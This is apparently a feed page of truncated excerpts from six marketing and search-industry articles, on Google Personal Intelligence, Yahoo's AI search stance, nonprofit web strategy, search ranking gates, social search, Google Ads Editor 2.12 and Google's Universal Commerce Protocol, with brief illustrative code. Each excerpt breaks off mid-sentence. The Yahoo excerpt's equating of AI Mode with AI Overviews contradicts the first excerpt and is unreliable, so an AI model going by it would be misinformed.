Google expands Personal Intelligence to AI Mode, Gemini, Chrome

In a significant move that signals the next era of search and digital assistance, Google has officially begun expanding its “Personal Intelligence” features across its most vital consumer platforms. Previously limited to a select group of beta testers and high-tier subscribers, these advanced AI capabilities are now rolling out to AI Mode in Google Search, the Gemini mobile app, and the Google Chrome browser for users across the United States. This expansion marks a fundamental shift in how Google interacts with its users. By bridging the gap between general web information and a user’s private data—such as emails, calendar events, and photo libraries—Google is moving away from being a mere search engine and toward becoming a true “proactive assistant.” For the tech industry and the digital marketing landscape, this represents a pivot toward hyper-personalization that could redefine the user experience for years to come. What is Google Personal Intelligence? At its core, Personal Intelligence is a framework that allows Google’s generative AI models to access and synthesize information from a user’s personal ecosystem. While standard AI models like Gemini are trained on massive datasets of public information, Personal Intelligence allows the AI to “know” the user. It draws context from first-party data stored within Google’s own suite of applications, including Gmail, Google Drive, and Google Photos. The goal is to provide answers that are not just factually correct, but contextually relevant to the individual. Instead of searching for “how to fix a dishwasher,” a user might ask, “How do I fix my dishwasher?” and the AI will look through Gmail for a digital receipt or a manual to identify the exact model number and provide specific instructions. This feature was initially introduced as a U.S.-only beta in January 2024, exclusively for users with Gemini Advanced subscriptions (those on the AI Premium plan using Pro and Ultra models). The current expansion brings these capabilities to the broader public, including those using the free version of Gemini and those utilizing the new AI Mode in standard Google Search. Integration Across AI Mode, Gemini, and Chrome The rollout is occurring simultaneously across three primary touchpoints, ensuring that users can access their personalized AI assistant regardless of how they choose to interact with the web. AI Mode in Google Search AI Mode represents the latest evolution of the search experience. Unlike the traditional list of blue links or even the AI Overviews that summarize web content, AI Mode is designed for deep, conversational queries. With the addition of Personal Intelligence, U.S. users can now ask Search to perform tasks that involve their own data. This feature is currently active and represents a major step in Google’s attempt to modernize its core product. The Gemini App For mobile users, the Gemini app is the primary hub for these features. While the Personal Intelligence features were previously locked behind a paywall, Google is now rolling them out to free users. This means millions of additional people will soon be able to ask Gemini to summarize emails, find specific photos based on descriptions, or check their flight status directly within the chat interface. Gemini in Chrome Google is also integrating these capabilities directly into the Chrome browser. This allows for a more seamless workflow where users can invoke Gemini while browsing other websites. 
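To make the pattern concrete, the flow described above (take the question, retrieve whatever personal context the user has opted to share, then ground the answer in it) can be sketched in a few lines of Python. Every name in the sketch is hypothetical: Google has not published a Personal Intelligence API, so this illustrates the described behavior rather than any real implementation.

```python
# Purely illustrative sketch of the pattern described above: gather personal
# context first, then ground the answer in it. None of these names correspond
# to a real Google API; the connectors and data are hypothetical stand-ins.

def find_personal_context(query: str, connected_sources: dict) -> list[str]:
    """Search whichever sources the user has opted in to for relevant snippets."""
    snippets = []
    for source_name, documents in connected_sources.items():
        for doc in documents:
            if any(word in doc.lower() for word in query.lower().split()):
                snippets.append(f"[{source_name}] {doc}")
    return snippets

def answer_with_personal_context(query: str, connected_sources: dict) -> str:
    """Build a grounded prompt; a real system would pass this to a model."""
    context = find_personal_context(query, connected_sources)
    prompt = (
        "Answer the user's question using their personal context.\n"
        f"Context: {context}\n"
        f"Question: {query}"
    )
    return prompt  # placeholder for an actual model call

# Example: the dishwasher scenario from the article (model number is invented).
sources = {
    "gmail": ["Receipt: Bosch SHX78 dishwasher, purchased 2023-05-12"],
    "calendar": ["Plumber visit scheduled for Friday"],
}
print(answer_with_personal_context("how do I fix my dishwasher", sources))
```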
By having access to Personal Intelligence in the browser, Gemini can help users fill out forms, cross-reference information on a website with their personal notes, or manage their schedule without ever leaving the current tab. Real-World Applications: How Personal Intelligence Works The true value of Personal Intelligence lies in its ability to handle complex, multi-step queries that would normally require a user to jump between several different apps. Google has highlighted several key use cases that demonstrate the power of this integration: 1. Hyper-Personalized Shopping Shopping becomes significantly more efficient when the AI understands your preferences. If you ask for a recommendation for a new pair of running shoes, Personal Intelligence can look at your past purchase history in Gmail to identify brands you prefer, sizes you wear, and even the frequency with which you replace your gear. It can then filter search results to prioritize the brands you trust and the stores where you have loyalty accounts. 2. Technical Troubleshooting One of the most frustrating aspects of modern life is finding the right support for a specific device. Instead of digging through a junk drawer for a paper manual, users can rely on Gemini to find the exact receipt or confirmation email for a tech purchase. The AI can identify the model, check warranty status, and provide troubleshooting steps tailored specifically to that hardware. 3. Travel and Itinerary Management Travel planning is a logistics-heavy task that Google is uniquely positioned to solve. By connecting to Gmail and Google Calendar, the AI can see upcoming flight details, hotel reservations, and car rentals. Users can ask, “What’s my schedule for my Chicago trip next week?” and receive a comprehensive itinerary that combines their bookings with local weather forecasts and restaurant recommendations based on past dining preferences. 4. Hobby and Interest Cultivation Google’s AI can also infer interests based on a user’s YouTube history and search patterns. If a user has been watching a lot of woodworking videos, Personal Intelligence might suggest local workshops or notify the user when a specific tool they’ve been researching goes on sale. It transforms the AI from a reactive tool into a proactive hobbyist companion. Privacy, Consent, and Data Security Whenever a tech giant expands its access to personal data, privacy concerns inevitably arise. Google has been proactive in addressing these issues, emphasizing that Personal Intelligence is built on a foundation of user control and transparency. Key privacy safeguards include: Opt-in Only: These features are not turned on by default. Users must explicitly choose to connect their Gmail, Photos, and other apps to the Gemini ecosystem. Granular Control: Connections are not all-or-nothing. A user can choose to let the AI see their emails but block access to their Google

Yahoo CEO: Google AI Mode is the biggest threat to web traffic

The digital landscape is currently undergoing its most significant transformation since the invention of the search engine itself. As artificial intelligence becomes deeply integrated into the way we find information online, the foundational “search-to-click” model that has sustained the open web for decades is facing an existential crisis. In a recent and candid discussion on The Verge’s “Decoder” podcast, Yahoo CEO Jim Lanzone addressed these concerns, labeling Google’s AI Mode as the single greatest threat to web traffic today. His insights provide a stark warning for publishers while outlining a different path forward for one of the internet’s legacy giants. The Erosion of the Open Web’s Core Traffic Model For nearly thirty years, the relationship between search engines and publishers has been symbiotic. Publishers create high-quality content—news, guides, reviews, and data—and search engines provide the discovery mechanism that drives traffic back to those creators. This traffic, in turn, fuels the advertising and subscription revenue that allows publishers to keep producing content. However, the advent of Large Language Models (LLMs) and generative AI search features is rapidly dismantling this cycle. Lanzone specifically pointed to Google’s AI Mode—often referred to as AI Overviews or Search Generative Experience (SGE)—as the primary disruptor. By providing comprehensive, AI-generated answers directly on the search results page, these “answer engines” often remove the need for a user to click through to the source website. When a user gets their answer without leaving the search page, the publisher loses the opportunity to monetize that visit, yet their content was likely used to train the very AI that replaced them. Lanzone noted that LLMs are a significant reason why the open web is under threat. He argued that publishers deserve the traffic they have traditionally earned. Without a healthy publishing ecosystem, the cycle of information breaks down. If publishers cannot afford to create new content because their traffic has been siphoned off by AI summaries, the LLMs will eventually run out of fresh, high-quality data to consume, leading to a degradation in the quality of AI answers for everyone. Yahoo Scout: A Different Philosophy on AI Search While competitors are leaning heavily into chatbot-style interfaces that mimic human conversation, Yahoo is taking a more conservative and publisher-friendly approach. Lanzone introduced “Scout,” Yahoo’s answer engine, which is designed to enhance the search experience without cutting off the lifeline to content creators. Unlike ChatGPT or Google’s more conversational experiments, Scout is built to feel like a natural evolution of traditional search rather than a replacement for it. Yahoo’s approach with Scout is purposely paragraph-driven and link-heavy. The goal is not to act as a “friend” or a personal chatbot, but to serve as a high-utility interface that explicitly highlights and links back to the original sources. Lanzone emphasized that Yahoo has “bent over backwards” to ensure that traffic is sent downstream to the people who actually created the content. By maintaining this clear distinction between an AI-generated summary and the source material, Yahoo aims to preserve the value of the publisher’s work. This strategy also defines Yahoo’s position in the AI market. They are not attempting to build a general-purpose LLM that competes with OpenAI or Google in areas like coding or creative writing. 
Instead, they are focusing on “answer engines” that facilitate information retrieval while respecting the ecosystem that provides that information. The “Big Bad Wolf” and the Dangers of AI Intermediaries In one of the more poignant moments of the interview, Lanzone issued a warning to publishers and tech companies about the dangers of becoming overly reliant on AI platforms as intermediaries. He used a historical analogy, drawing from Yahoo’s own past, to illustrate the risk of letting a larger platform sit between a brand and its audience. In the early 2000s, Yahoo famously outsourced its search technology to Google, effectively giving a smaller competitor the keys to its kingdom. This move allowed Google to refine its algorithms using Yahoo’s massive user data, eventually leading to Google’s total dominance in search and the decline of Yahoo’s market share. Lanzone sees a similar pattern emerging today with LLMs. He warned that by opening up products to be accessed entirely within another company’s large language model, companies are “tempting fate.” The “Big Bad Wolf” metaphor serves as a reminder that while AI partnerships may seem beneficial and convenient today, they can lead to a loss of brand identity and direct user relationships in the long run. If a publisher’s content is only consumed through an AI’s voice, the publisher becomes an invisible commodity, easily replaced or sidelined by the platform owner. Personalization and Agentic Actions: The Next Frontier for Yahoo While Yahoo is cautious about the “chatbot” model, they are not shying away from AI innovation. Lanzone revealed that Yahoo is currently embedding AI across its entire ecosystem to improve utility and user experience. This includes major updates to Yahoo Finance and Yahoo Mail, two of the platform’s most robust pillars. In Yahoo Finance, AI is being used to provide on-the-fly analysis of stocks, summarizing complex financial data into actionable insights for investors. In Yahoo Mail, AI tools help users summarize long email threads and process messages more efficiently. This type of utility-based AI focuses on helping users accomplish specific tasks rather than just providing “answers.” Looking ahead, Lanzone discussed the transition into “agentic actions.” This represents a shift from AI that simply talks to AI that actually “does.” Agentic AI can take actions on behalf of the user—organizing schedules, making purchases, or managing workflows. By focusing on personalization and task completion, Yahoo hopes to increase the frequency with which its 700 million global users engage with the platform. Yahoo’s Market Position and Strategy It is no secret that Google dominates the search market share, but Lanzone clarified that Yahoo isn’t necessarily trying to “beat” Google at its own game. Yahoo’s search volume comes primarily from its existing, massive network. With 250 million users in the United States and 700 million globally, Yahoo remains a top-tier internet destination. The strategy

How nonprofits can build a digital presence that actually drives impact

How nonprofits can build a digital presence that actually drives impact For a long time, a nonprofit’s digital presence has been viewed as a peripheral necessity—a digital brochure that exists because “everyone else has one.” However, in the modern landscape of philanthropy and social advocacy, a digital presence is no longer a “nice-to-have” secondary asset. It is the central hub for mission delivery, donor engagement, and community advocacy. Whether you are a small local charity or a global NGO, your online footprint is often the first, and sometimes the only, point of contact for your supporters. Many organizations struggle with the technical and strategic foundations needed to turn a basic website and a handful of social media accounts into a high-performing digital ecosystem. The challenge often lies in a lack of resources or technical expertise, leading to a fragmented strategy that fails to convert interest into action. The goal of a digital strategy isn’t simply to “be online.” It is to build reliable, scalable infrastructure so your organization owns its narrative, protects its assets, and accurately measures the impact of every digital effort. To move from a passive online existence to a dynamic digital presence that drives real-world impact, nonprofits must approach their digital strategy with the same rigor they apply to their programmatic work. This requires getting the “digital house” in order, starting with the technical foundations and moving toward a sophisticated, data-driven engagement model. 1. Own your foundations: Domains and account control Owning your name and your story is an essential part of a proactive online reputation management strategy. In the digital realm, this translates to absolute control over your technical assets. One of the most overlooked risks in nonprofit management is the lack of direct ownership over the very tools that allow the organization to communicate with the world. In many cases, a well-meaning volunteer, a board member’s relative, or a third-party agency registers a domain name or creates social media accounts using their personal email credentials. While this may seem convenient during the initial setup, it creates a massive vulnerability. If that individual leaves the organization on bad terms, moves away, or simply becomes unreachable, the nonprofit risks losing access to its primary digital channels. Losing a domain name can be catastrophic, leading to a complete loss of SEO authority, broken links in past communications, and the need to rebuild a brand from scratch. Best practices for technical ownership To avoid these pitfalls, nonprofits must implement strict governance over their digital assets: Domain ownership: Ensure that your domain is registered in the organization’s legal name. Always use a generic, organization-controlled email address—such as “admin@yournonprofit.org” or “info@yournonprofit.org”—rather than a personal one. This ensures that even if staffing changes occur, the organization retains access to the registrar account. Additionally, enable auto-renewal and select a registrar that offers multi-factor authentication and robust security features to prevent unauthorized transfers. Website hosting and management: Similar to domain registration, the organization should hold the primary account for website hosting. If an agency manages your site, ensure you have “Owner” or “Super Admin” level access to the hosting control panel and the Content Management System (CMS). 
You should never be in a position where you have to “ask permission” to access your own data or site files. Social media governance: Establish ownership of key social media channels using the same generic email strategy. Most platforms, such as Facebook (via Meta Business Suite) and LinkedIn, allow you to grant access to individuals via delegation. Never share a single password among multiple people. Instead, assign roles (Editor, Admin, Advertiser) to individual personal accounts. This allows you to revoke access immediately when someone moves on, protecting the brand’s voice and security without compromising the account itself. 2. Move beyond ‘winging it’: The editorial calendar A common mistake for nonprofits is the “broadcast-only” approach to content. This happens when an organization only posts when there is an immediate, often desperate, need—such as an emergency fundraising appeal or a call for volunteers. When a nonprofit’s feed consists of nothing but “asks,” it leads to donor fatigue and a steady decline in engagement. Supporters want to see the results of their contributions, not just requests for more. To build a thriving digital community, you need a content plan that balances stories of impact with actionable requests. This requires moving away from “winging it” and toward a structured editorial calendar. The 70/20/10 rule for content A balanced content strategy ensures that you are providing value to your audience before asking them to provide value to you. A helpful framework is the 70/20/10 rule: 70% Value-Based Content: The majority of your content should focus on impact stories, educational information, and “behind-the-scenes” looks at your work. Show the faces of the people you help, share the statistics of your success, and position your organization as a thought leader in your specific cause. 20% Shared Content: Nonprofits exist within an ecosystem. Share relevant news, articles, or posts from partners, community members, or other experts in your field. This builds goodwill and shows that you are part of a larger movement. 10% Direct Asks: This is where you make your pitch. Whether it is a donation request, a volunteer signup, or an invitation to an event, your “asks” will be much more effective because you have spent the other 90% of your time building trust and demonstrating value. Implementing an editorial calendar An editorial calendar doesn’t need to be complex. It can be as simple as a shared spreadsheet or a dedicated project management tool. The goal is to map out themes and specific pieces of content at least a month in advance. This bird’s-eye view ensures that your messaging remains consistent across email, social media, and your blog. It also prevents the “Giving Tuesday” scramble, allowing your team to produce high-quality assets like videos and graphics well before they are needed. 3. Tracking what matters (and ignoring what doesn’t) Data is the lifeblood of digital growth, but only if it informs future

5 competitive gates hidden inside ‘rank and display’

The digital marketing landscape is currently undergoing a foundational shift. For years, content strategists and SEO professionals have operated under a simplified model often referred to as “rank and display.” In this traditional view, you create content, search engines index it, and if your signals are strong enough, you rank. However, as artificial intelligence and assistive engines take center stage, this two-step compression is no longer sufficient to describe how information is actually surfaced to users. If you are a content strategist, you might feel that the deep technical infrastructure of search engines is outside your territory. In reality, everything you build feeds into a sophisticated five-gate competitive system. The decisions made by algorithms at these gates determine whether the system recruits your content, trusts it enough to display it, and ultimately recommends it to a potential customer. To succeed in this new era, we must move beyond “rank and display” and understand the ARGDW competitive phase. The competitive turn: Where absolute tests become relative ones To understand the competitive phase, we first have to look at what precedes it. The initial stage of content discovery is the DSCRI infrastructure phase, which covers discovery, crawling, rendering, and indexing. These are absolute tests. Either the system has your content, or it doesn’t. If your site fails to render correctly or cannot be crawled, it never enters the race. The transition from indexing to the next stage is what we call the “competitive turn.” This is the most significant moment in the content pipeline. Once a page is indexed, the system stops asking “Do I have this?” and starts asking “Is this better than the alternatives?” Every gate from this point forward is a relative test. It is a Darwinian environment of “survival of the fittest.” Your content doesn’t just need to be technically sound; it needs to beat the alternatives in terms of confidence, clarity, and relevance. A page that is perfectly indexed but poorly understood by the algorithm will lose to a competitor whose content the system understands with greater certainty. The infrastructure phase provides the raw material; the competitive phase determines if that material is worthy of the user’s attention. Multi-graph presence as a structural advantage in ARGDW The modern “algorithmic trinity”—consisting of search engines, knowledge graphs, and Large Language Models (LLMs)—operates across the competitive gates of annotation, recruitment, grounding, and display. To win, a brand must establish a presence across three distinct knowledge structures: the document graph, the entity graph, and the concept graph. This is where “single-graph thinking” becomes a major liability. Traditional SEO focuses almost exclusively on the document graph—ranking pages based on keywords and links. However, an entity that exists in the entity graph with confirmed attributes (like a robust Knowledge Panel or structured data) receives a significantly higher confidence score. If the system can verify your claims against structured facts in an entity graph, it trusts your document graph content more. Furthermore, the concept graph handles association patterns and expertise. Brands that invest in consistent, well-structured copywriting across authoritative platforms optimize for this third graph. When a brand is present in all three, it creates a compounding advantage. 
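One practical way to give the entity graph "confirmed attributes" to verify is schema.org structured data. The snippet below is a minimal, hypothetical illustration; the organization details are placeholders, and Python is used only to keep the example self-contained. The point is that structured, machine-readable facts give a system something concrete to corroborate against the prose on the page.

```python
import json

# Minimal schema.org Organization markup. The details are placeholders; the
# idea is that verifiable attributes (name, official URL, corroborating
# profiles, founding facts) let an entity graph confirm who is speaking.
organization = {
    "@context": "https://schema.org",
    "@type": "Organization",
    "name": "Example Brand Co.",
    "url": "https://www.example.com",
    "sameAs": [
        "https://en.wikipedia.org/wiki/Example",          # corroborating profile
        "https://www.linkedin.com/company/example",       # corroborating profile
    ],
    "founder": {"@type": "Person", "name": "Jane Doe"},
    "foundingDate": "2012-04-01",
}

# Emit the JSON-LD a template would place inside a <script type="application/ld+json"> tag.
print(json.dumps(organization, indent=2))
```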
The system can cross-reference information, reducing “fuzziness” and ambiguity, which allows your content to pass through competitive gates that stop your competitors in their tracks. Annotation: The gate that decides what your content means Annotation is perhaps the most overlooked gate in the entire pipeline, yet it acts as the hinge between infrastructure and competition. As Fabrice Canel of Microsoft Bing noted, the system must provide “richness on top of HTML” by extracting features and providing annotations that other teams (like the ranking or display teams) can use. Annotation is where the system reads what it has stored and decides what it actually means. This classification process is incredibly complex, operating across at least five categories and more than 24 dimensions. The system uses specialist models to score your content before it ever considers ranking it. If the annotation is inaccurate, your content is essentially filed in the wrong drawer, making it invisible to the relevant queries. The Gatekeepers These models determine if your content is even eligible for specific competitive pools. They look at temporal scope (is the information current?), geographic scope (where is this relevant?), and language. They also handle entity resolution—ensuring the “Jason Barnard” mentioned on the page is the correct “Jason Barnard” and not someone else with the same name. Fail here, and you are excluded regardless of your content’s quality. Core Identity and Selection Filters Core identity models classify the substance of the content, identifying entities, attributes, and relationships. Selection filters then add query routing, determining the intent category (informational vs. transactional) and the expertise level. If your content is classified as informational but the user has transactional intent, the selection filter will route the user away from your page. Extraction Quality and Confidence Multipliers Extraction quality scores look at “standalone” potential. Can a chunk of your content be extracted and still make sense to a user? If your content relies too heavily on surrounding context that the AI can’t easily parse, it receives a lower score. Finally, confidence multipliers determine how much the system trusts its own classification. This involves verifiability, provenance, and how well your claims align with the established consensus. Confidence: The single most important factor in SEO and AAO For years, the industry mantra was “content is king.” Later, “context” became the focus. Today, the real king is confidence. Assistive engines and search platforms have a primary goal: to retain users by providing helpful, accurate results. If an engine has high-quality content that seems relevant but has low confidence in its accuracy, it will likely pass over that content to avoid providing a poor or misleading user experience. Confidence is a multiplier. It determines whether the system has the “courage” to use your content in a featured snippet, an AI summary, or a direct recommendation. High confidence is built through corroboration across different graphs and the

Why social search visibility is the next evolution of discoverability

Why social search visibility is the next evolution of discoverability For more than two decades, the roadmap for digital marketing was remarkably straightforward: if you wanted to be found, you had to rank on Google. Search Engine Optimization (SEO) was a discipline built almost entirely around the mechanics of a single algorithm. We obsessed over keywords, backlink profiles, and technical site health, all in an effort to capture a slice of the massive demand flowing through Google’s search results. For a long time, this was the only game in town. However, the walls of the “Google-only” garden are beginning to crumble. We are currently witnessing a fundamental shift in how human beings navigate the digital world. Search behavior is no longer confined to a single white box on a minimalist landing page. Instead, it has fractured and dispersed across an entire ecosystem of platforms, each serving a distinct psychological need. This shift represents the next great evolution of discoverability, moving us from a world of “Search Engines” to a world of “Search Everywhere.” Today, when a consumer wants to know how to fix a leaky faucet, they go to YouTube. When they want to find a trendy restaurant in a new city, they open TikTok. When they want an unvarnished, honest opinion on a new laptop, they append “Reddit” to their query or search the forum directly. When they want to buy a product, they start on Amazon. This diversification of search behavior is perhaps the most significant—and most overlooked—opportunity in modern digital marketing. Understanding the Diversification of Search Behavior The traditional search strategy was built on the assumption that Google was the universal starting point for every digital journey. Recent data, however, tells a much more nuanced story. Research conducted by SparkToro and Datos analyzed search behavior across 41 major platforms, including traditional search engines, e-commerce giants, social networks, and emerging AI tools. The findings confirm that while Google remains a titan, the “search universe” is expanding rapidly. According to the research, search activity is roughly distributed as follows: Traditional Search Engines: These still command approximately 80% of all search activity, with Google alone holding a dominant 73.7% share. Commerce Platforms (Amazon, Walmart, eBay): These account for roughly 10% of search volume, representing high-intent users ready to convert. Social Networks: Platforms like TikTok, Instagram, and Reddit capture about 5.5% of search activity. AI Tools (ChatGPT, Claude, Perplexity): Despite the massive hype, these currently account for about 3.2% of search behavior. While 5.5% for social networks might seem small compared to Google’s 73%, it is important to look at the trend line rather than just the snapshot. The percentage of users—particularly Gen Z and Alpha—who prefer social discovery over traditional indexing is growing year over year. Consumers are increasingly searching directly on platforms where they expect to find the most useful answers in the formats they prefer, rather than relying on a middleman to send them to a third-party website. The AI Distraction vs. The Social Reality If you spend any time reading tech news or marketing blogs, you would think that AI search is the only thing that matters in 2024 and 2025. 
The industry is currently obsessed with questions like “How do I rank in ChatGPT?” or “Will Perplexity kill Google?” While these are valid questions for the long term, they often distract marketers from the massive shifts happening right now in the mainstream. The SparkToro data highlights a grounding reality: AI search tools currently account for only 3.2% of search activity. This is meaningful, and AI will undoubtedly reshape how we interact with information, but it is currently a smaller slice of the pie than established discovery platforms. For context, Amazon receives more searches than ChatGPT. YouTube receives more searches than ChatGPT. Even Bing, often the underdog of the search world, sees more search activity than the current crop of AI chatbots. Many brands are pouring a disproportionate amount of resources into “AI Optimization” while completely ignoring platforms where millions of high-intent searches are already happening every single day. The real opportunity for the next 12 to 18 months isn’t just in the LLMs (Large Language Models); it’s in the social search engines that have already achieved broad, mainstream adoption. Social Platforms as the New Search Engines The definition of a “search engine” has expanded. It is no longer just a crawler that indexes web pages; it is any platform that allows a user to input an intent and receive a curated set of results. For a huge demographic of users, social platforms have become their primary search destinations. Each platform plays a unique role in the consumer’s discovery journey. TikTok and Instagram: The Hub of Recommendations TikTok has become the search engine of choice for lifestyle, travel, and product recommendations. Its algorithm is uniquely suited to “discovery search”—finding things you didn’t know you were looking for, or finding the “vibe” of a place through short-form video. Users search for things like “best affordable skincare” or “hidden gems in Tokyo” because they want to see the proof, not just read a meta-description. YouTube: The Global Tutorial Library YouTube is technically the second largest search engine in the world. It is the destination for tutorials, long-form reviews, and deep-dive problem-solving. If a user needs to see how a product works or learn a complex skill, they go to YouTube first. Search intent on YouTube is often educational or evaluative, making it a critical touchpoint for brands in the “consideration” phase of the funnel. Reddit: The Trust Layer of the Internet In an era of AI-generated content and SEO-optimized affiliate blogs, Reddit has become the “trust layer.” Users search Reddit (or use Google to find Reddit threads) because they want human opinions, unfiltered discussions, and community-vetted advice. If someone is looking for the “best gaming mouse,” they don’t want a listicle; they want to see what 500 enthusiasts on r/MouseReview think. Pinterest: Visual Planning and Inspiration Pinterest is often miscategorized as a social network, but it functions much

Google Ads Editor 2.12 adds creative control and campaign flexibility

Digital marketing is currently undergoing a massive paradigm shift, moving away from manual keyword bidding and toward AI-orchestrated campaign management. For power users, the desktop-based Google Ads Editor remains the gold standard for managing complex accounts at scale. The latest update, Google Ads Editor 2.12, represents a significant step forward in this evolution. It focuses on giving advertisers more creative control and campaign flexibility while leaning into the automated nature of Performance Max and Demand Gen campaigns. As Google continues to integrate sophisticated machine learning into its advertising ecosystem, version 2.12 introduces a suite of features designed to help marketers guide AI more effectively. This update isn’t just about technical tweaks; it is about providing the guardrails and creative variety necessary to excel in a mobile-first, video-centric landscape. Enhanced Creative Power in Performance Max Performance Max (PMax) has become the centerpiece of many digital marketing strategies. However, one of the primary criticisms from veteran PPC managers has been the perceived “black box” nature of its creative distribution. Google Ads Editor 2.12 addresses this by significantly expanding the creative limits within PMax asset groups. Expanding Video Capacity One of the most notable changes in version 2.12 is the ability to include up to 15 videos per asset group in Performance Max campaigns. Previously, the limits were tighter, often forcing advertisers to make difficult choices about which creative variations to test. By allowing 15 videos, Google is encouraging a “more is more” approach to data-driven testing. This expansion allows the Google AI to test a wider variety of hooks, storytelling styles, and calls to action (CTAs). For instance, an e-commerce brand can now upload product-focused demos, testimonial-style clips, high-energy montages, and cinematic brand stories all within the same asset group. This provides the algorithm with a deeper pool of content to match with specific user intents across YouTube, Display, and the Discovery feed. Mobile-First Vertical Image Support The rise of short-form video content on platforms like YouTube Shorts has fundamentally changed how users consume media. To keep pace, Google Ads Editor 2.12 introduces support for 9:16 vertical images. This ensures that assets are naturally optimized for vertical viewing environments, preventing awkward cropping or letterboxing that can diminish brand prestige. By providing dedicated 9:16 assets, advertisers can ensure their visuals occupy the entire screen on mobile devices. This is particularly vital for Performance Max and Demand Gen campaigns, where the goal is to capture attention in high-velocity scrolling environments. Driving Growth with Demand Gen Enhancements Demand Gen campaigns, which replaced Discovery ads, are designed to capture interest on Google’s most visual platforms. Version 2.12 brings several structural updates to Demand Gen that provide better targeting and more refined campaign setups. New Customer Acquisition Goals Focusing on growth often requires prioritizing new shoppers over returning ones. Google Ads Editor 2.12 now supports “New Customer Acquisition” goals within Demand Gen campaigns. This feature allows advertisers to bid more aggressively for users who have not previously interacted with the brand or to target them exclusively. 
This is a major win for performance marketers who need to prove that their ad spend is driving incremental growth rather than just recapturing existing traffic. Having this capability within the Editor makes it easier to apply these goals across multiple campaigns or accounts in bulk. Integrating Hotel Feeds The travel industry gets a specific boost in this update with the integration of hotel feeds into Demand Gen campaigns. Advertisers in the hospitality sector can now link their product feeds directly, allowing the AI to dynamically generate ads featuring specific properties, pricing, and availability. This level of automation ensures that ads remain relevant to real-time inventory without requiring constant manual updates. Streamlined Campaign Setup and Minimum Budgets To ensure campaign stability, Google has introduced a new minimum daily budget requirement for Demand Gen. This is designed to prevent “under-funding,” where the AI lacks sufficient data to learn and optimize correctly. Furthermore, the campaign build flow within the Editor has been streamlined, reducing the friction involved in launching complex, asset-heavy campaigns. The Evolution of Video and AI Guardrails As AI-generated assets and automated video formats become more prevalent, Google is introducing tools to help advertisers maintain brand integrity. Google Ads Editor 2.12 adds specific “Brand Guideline” controls and text requirements that ensure AI-generated content remains compliant with a company’s voice and visual identity. Non-Skippable Video Updates For brands focused on awareness and reach, non-skippable video ads are a staple. The 2.12 update improves the management of these formats within the Editor, allowing for better alignment with broader video strategies. Advertisers can now more easily toggle between skippable and non-skippable formats while maintaining a birds-eye view of their bidding strategies. Real-Time Bid Guidance Bidding in an automated world can sometimes feel like a guessing game. Version 2.12 offers improved bid guidance, providing real-time feedback and suggestions based on historical data and current market trends. This helps advertisers set realistic CPA (Cost Per Acquisition) or ROAS (Return On Ad Spend) targets that are ambitious yet achievable. Advanced Budgeting: Total Campaign Budgets Perhaps one of the most practical additions in this release is the “Total Campaign Budget” feature. Historically, Google Ads has focused on daily budgets, where the platform calculates spend over a 30.4-day average. While effective, this can be cumbersome for short-term promotions, seasonal events, or “flash” sales. With Total Campaign Budgets, an advertiser can set a hard cap for a specific date range—for example, $5,000 for a 4-day Black Friday event. Google’s system then automatically paces the delivery to ensure the budget is maximized over that specific window. This eliminates the need for manual daily adjustments and reduces the risk of overspending on the final day of a promotion. Workflow Optimization and Efficiency Tools The core appeal of Google Ads Editor has always been its ability to save time through bulk actions and offline editing. Version 2.12 introduces several “quality of life” improvements that significantly reduce manual labor for account managers. Account-Level Tracking Templates Tracking is the backbone of attribution, but managing

How Google’s Universal Commerce Protocol could reshape search conversions

How Google’s Universal Commerce Protocol could reshape search conversions The landscape of digital commerce is undergoing its most significant transformation since the invention of the mobile shopping cart. As Google continues to integrate artificial intelligence into the core of its search experience through AI Overviews, Gemini, and AI Mode, the way consumers interact with brands is shifting from a “click-and-browse” model to an “ask-and-action” model. At the heart of this evolution is Google’s Universal Commerce Protocol (UCP). Currently in beta, the Universal Commerce Protocol represents a fundamental shift in how transactions occur on the web. For years, the goal of search engine optimization (SEO) and search engine marketing (SEM) was to drive traffic to a brand’s website where the conversion would hopefully take place. UCP challenges this paradigm by allowing the conversion to happen directly within the AI interface. This “agentic commerce” approach aims to minimize friction, but it also requires a complete rethink of how brands manage their product data and technical infrastructure. What is Google’s Universal Commerce Protocol? At its simplest level, the Universal Commerce Protocol is a standardized framework that allows consumer AI interfaces—like Gemini—to communicate directly with a merchant’s backend checkout system. Think of it as a universal language that allows an AI “agent” to act on behalf of a user to find, vet, and purchase a product without the user ever needing to navigate a traditional website. When a user provides a complex prompt such as, “Find me a pair of carbon-plated running shoes for a marathon, size 11, under $250, with five-star reviews, and buy them using my primary shipping address,” UCP is the invisible bridge. It allows the LLM (Large Language Model) to securely query real-time inventory, apply loyalty points, process payments through the merchant’s gateway, and finalize the order. While the technical documentation refers to advanced concepts like Model Context Protocol (MCP) and Agent2Agent (A2A) interoperability, the practical goal is simple: to turn search results into a seamless, transactional storefront. Crucially, Google is positioning UCP as a merchant-friendly tool. Unlike some third-party marketplaces that “own” the customer and hide the data, UCP is designed so that the brand remains the merchant of record. This means the brand still processes the payment, keeps the customer data, and manages the fulfillment and relationship. The Mechanics of UCP: How It Works in Practice The workflow of a UCP transaction is designed to be as frictionless as possible. It moves through a specific sequence that balances AI convenience with merchant control: The process begins with a conversational query. Because LLMs understand intent and context far better than traditional keyword search, they can filter products based on highly specific criteria. Once a product is identified, UCP facilitates the handshake between the AI and the merchant’s data. This includes checking stock levels and verifying current pricing. Next, the protocol handles the “check-out” logic. Google offers two main paths here: Native Checkout and Embedded Checkout. Native Checkout is the most integrated experience, where the purchase logic is baked directly into the AI interface. Embedded Checkout uses an iframe-based solution, which allows for more bespoke branding but offers a slightly higher friction point than the native option. 
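Because UCP is still in beta, its concrete interfaces are not public, and nothing below comes from Google's documentation. The sketch simply walks through the sequence just described with invented names (filter candidates against the user's criteria, re-verify stock and pricing with the merchant, then complete a native or embedded checkout) to show the shape of the flow rather than a real integration.

```python
# Hypothetical walk-through of the sequence described above. UCP is in beta and
# none of these names come from Google's documentation; they are invented to
# show the shape of the flow, not its real interface.
from dataclasses import dataclass

@dataclass
class Product:
    title: str
    price: float
    size: str
    in_stock: bool
    rating: float

CATALOG = [
    Product("Carbon-plated marathon shoe", 239.00, "11", True, 4.9),
    Product("Carbon-plated marathon shoe", 259.00, "11", True, 5.0),
]

def match_products(max_price: float, size: str, min_rating: float) -> list[Product]:
    """Steps 1-2: the agent filters candidates against the user's stated criteria."""
    return [p for p in CATALOG
            if p.price <= max_price and p.size == size and p.rating >= min_rating]

def verify_availability(product: Product) -> bool:
    """Step 3: the protocol re-checks live stock and pricing with the merchant."""
    return product.in_stock

def execute_checkout(product: Product, mode: str = "native") -> dict:
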